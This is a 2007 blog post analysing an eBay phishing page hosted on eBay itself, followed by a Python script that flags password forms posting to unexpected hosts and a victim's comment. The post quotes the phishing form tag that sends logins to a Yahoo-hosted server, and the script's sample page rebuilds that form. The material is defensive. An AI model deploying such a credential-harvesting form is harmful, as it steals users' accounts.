Saturday, February 17, 2007

Using Ebay to phish Ebay...

In what I think is the best phishing attempt I have seen for an eBay account, I received a question about my currently running eBay auction (and this question was sent to me via eBay's messaging system and viewable directly online in their messaging system)...

I want to know if this is the same item with the item listed at this address: http://members.ebay.com/aboutme/**********
From: imabrit! (1246)

Now, I know I did not list the same item under some other user, and I noticed that the sender of this message was someone who had a rating of 1246 (for real), so I went to look at the item to see what's up and I got to the following page:

This looks like a normal eBay login page. This is hosted on eBay (the URL for the page is on eBay). One might even expect to be prompted for authentication before they could look at another user's profile. However, I knew I already had a live authentication session at eBay and therefore shouldn't be prompted for credentials. So, I started to wonder if this was a phish attempt.

First I checked the URLs and the links and they all looked fine (yes, this page was coming from eBay's site). Then I checked the page by walking to it through the member profile lookup on the Community page. I still ended up with the same page that looks legit and is hosted by eBay.

But, it still didn't feel right, so I pulled up the source for the HTML page and much of it was the normal eBay page. However, the data entry form had the following code:

<form ... action="http://us.1.p10.webhosting.yahoo.com/forms?login=....." onSubmit="return checkForm0()">

This submits the form data to a web server hosted at Yahoo (not one of Yahoo's own services, but they allow others to pay for hosting).

I don't know how the average user could ever figure this out and I would expect that many, if not most, phishing aware technologists would also fall prey to this one (yeah, I do think I'm special :-)).

UPDATE (2/17): It's actually easier to tell than I thought (after looking closely at the real sign-in page): The URL for any eBay login MUST start with https://signin.ebay.com. Now, I've been an eBayer since 1998 and I pay close attention to phishing attempts, but I couldn't have quoted that to you until I looked for it today, so I'm not sure how many others will know.
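
As an added example (not code from the original post), the following Python script automates the two checks the post arrives at by hand: it parses a page's HTML, finds every form that collects a password, and flags any whose action is not an https URL on the expected sign-in host. The sample page is constructed; the two hostnames (members.ebay.com, us.1.p10.webhosting.yahoo.com) and the signin.ebay.com rule come from the post, while the seller name, the query string on the Yahoo-hosted action and the eBay sign-in path are placeholders.

```python
"""Audit credential forms in an HTML page: flag any form that collects a password
but submits somewhere other than the expected sign-in origin over https."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _FormCollector(HTMLParser):
    """Collect each <form>'s resolved action URL and whether it holds a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # html.parser lower-cases tag and attribute names
        if tag == "form":
            # A missing or relative action resolves against the page's own URL.
            action = urljoin(self.page_url, attrs.get("action") or "")
            self._current = {"action": action, "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_forms(html, page_url, allowed_signin_hosts):
    """Return one finding per password-collecting form whose action is not an
    https URL on one of the allowed sign-in hosts."""
    collector = _FormCollector(page_url)
    collector.feed(html)
    collector.close()
    page_host = urlparse(page_url).hostname or ""
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        target = urlparse(form["action"])
        host = target.hostname or ""
        reasons = []
        if target.scheme != "https":
            reasons.append("not https")
        # Compare the parsed hostname, not a string prefix: a prefix test on
        # "https://signin.ebay.com" would also accept "https://signin.ebay.com.example/".
        if host not in allowed_signin_hosts:
            reasons.append("host not an allowed sign-in host")
        if reasons:
            findings.append({
                "action": form["action"],
                "action_host": host,
                "page_host": page_host,
                "reasons": reasons,
            })
    return findings


# Constructed sample page (hypothetical): a phish form shaped like the one in the
# post, next to a benign form that posts to the real sign-in host, and a search
# form that collects no password. Seller name, query string and paths are placeholders.
SAMPLE_PAGE_URL = "http://members.ebay.com/aboutme/EXAMPLE_SELLER"
SAMPLE_HTML = """
<html><body>
<form name="SignInForm" method="post"
      action="http://us.1.p10.webhosting.yahoo.com/forms?login=PLACEHOLDER"
      onSubmit="return checkForm0()">
  <input type="text" name="userid">
  <input type="password" name="pass">
</form>
<form method="post" action="https://signin.ebay.com/EXAMPLE_PATH">
  <input type="text" name="userid">
  <input type="password" name="pass">
</form>
<form method="get" action="/search">
  <input type="text" name="q">
</form>
</body></html>
"""

EXPECTED_SIGNIN_HOSTS = {"signin.ebay.com"}

if __name__ == "__main__":
    for finding in audit_login_forms(SAMPLE_HTML, SAMPLE_PAGE_URL, EXPECTED_SIGNIN_HOSTS):
        print(f"credential form on {finding['page_host']} posts to "
              f"{finding['action']} ({', '.join(finding['reasons'])})")
```

Run against the sample, the script reports only the first form: it posts to the Yahoo-hosted address and does so over plain http. Matching on the parsed hostname rather than on a URL prefix matters, because a lookalike such as signin.ebay.com.example would pass a naive "starts with https://signin.ebay.com" test.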


1 comment:

Anonymous said...

OMG, I have been on ebay for 7 years, and like to think that I am completely aware of any phishing attempts. Lord knows, I used to get plenty of them. However, I fell for this last night. I realized it today, when I noticed someone had used my account to send the exact same message to 5 other sellers. I immediately changed my password, and thankfully I caught it before any bidding or selling took place. I just hate to think my account was used to pyramid this out. I am glad you posted this for others to see.